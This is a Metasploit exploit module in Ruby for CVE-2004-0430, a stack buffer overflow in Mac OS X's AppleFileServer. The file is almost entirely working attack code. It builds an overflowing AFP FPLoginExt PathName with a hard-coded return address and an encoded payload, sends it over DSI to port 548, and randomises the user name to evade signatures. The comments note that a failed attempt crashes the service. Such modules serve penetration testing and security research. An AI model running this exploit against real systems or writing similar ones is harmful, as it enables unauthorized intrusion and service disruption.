##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
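class MetasploitModule < Msf::Exploit::Remote
  # Average: one hard-coded, stack-based return address for a single OS build,
  # and the description says the target only gives you one attempt.
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Total length of the oversized AFP PathName that triggers the overflow.
  PATH_LEN = 1024
  # Offset inside the PathName at which the saved return address is
  # overwritten; the encoded payload is placed immediately after it.
  RET_OFFSET = 168

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AppleFileServer LoginExt PathName Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the AppleFileServer service
        on MacOS X. This vulnerability was originally reported by Atstake and
        was actually one of the few useful advisories ever published by that
        company. You only have one chance to exploit this bug.
        This particular exploit uses a stack-based return address that will
        only work under optimal conditions.
      },
      'Author'         => 'hdm',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0430' ],
          [ 'OSVDB', '5762' ],
          [ 'BID', '10271' ]
        ],
      'Payload'        =>
        {
          # RET_OFFSET + 4 + 512 bytes still fits inside the 1024-byte PathName.
          'Space'    => 512,
          # Bytes that must not appear in the encoded payload: NUL and space.
          'BadChars' => "\x00\x20",
          'MinNops'  => 128,
          'Compat'   =>
            {
              'ConnectionType' => "+find"
            }
        },
      'Platform'       => %w{ osx },
      'Targets'        =>
        [
          [
            'Mac OS X 10.3.3',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_PPC,
              # Points into the stack, so it only works when the stack layout
              # of this exact build matches ("optimal conditions").
              'Ret'      => 0xf0101c0c
            }
          ]
        ],
      'DisclosureDate' => '2004-05-03',
      # Operator-facing caveats: a missed return address takes the AFP
      # service down and there is no second attempt against the same process.
      'Notes'          =>
        {
          'Stability'   => [CRASH_SERVICE_DOWN],
          'Reliability' => [UNRELIABLE_SESSION]
        }))

    # AFP over TCP listens on 548 by default.
    register_options([ Opt::RPORT(548) ])
  end

  # Sends a single FPLoginExt request whose PathName overflows the stack
  # buffer, then waits for the payload to connect back. There is no
  # pre-check and no retry: a wrong return address crashes the service.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    request = dsi_request(login_ext_command(overflow_path))
    sock.put(request)

    handler
    disconnect
  end

  private

  # Builds the 1024-byte PathName: 0xff filler with the packed return
  # address at RET_OFFSET and the encoded payload directly after it.
  def overflow_path
    path = "\xff" * PATH_LEN
    path[RET_OFFSET, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
    path[RET_OFFSET + 4, payload.encoded.length] = payload.encoded
    path
  end

  # AFP FPLoginExt (command 0x3f) body: AFP version string and UAM as
  # length-byte-prefixed strings, then the user name and the path, each as
  # a type-3 name (0x03, big-endian 16-bit length, bytes).
  def login_ext_command(path)
    afp = "\x3f\x00\x00\x00"

    ["AFP3.1", "Cleartxt Passwrd"].each do |field|
      afp << [field.length].pack('C') << field
    end

    # Random 9-byte user name so the request is not trivially signaturable.
    afp << "\x03" << [9].pack('n') << rand_text_alphanumeric(9)
    afp << "\x03" << [path.length].pack('n') << path
    afp
  end

  # Wraps an AFP command in the 16-byte DSI header (request, DSICommand).
  def dsi_request(afp)
    header = [
      0,           # flags: request
      2,           # command: DSICommand
      rand(65536), # request ID
      0,           # data offset
      afp.length,  # total data length
      0            # reserved
    ].pack("CCnNNN")
    header + afp
  end
end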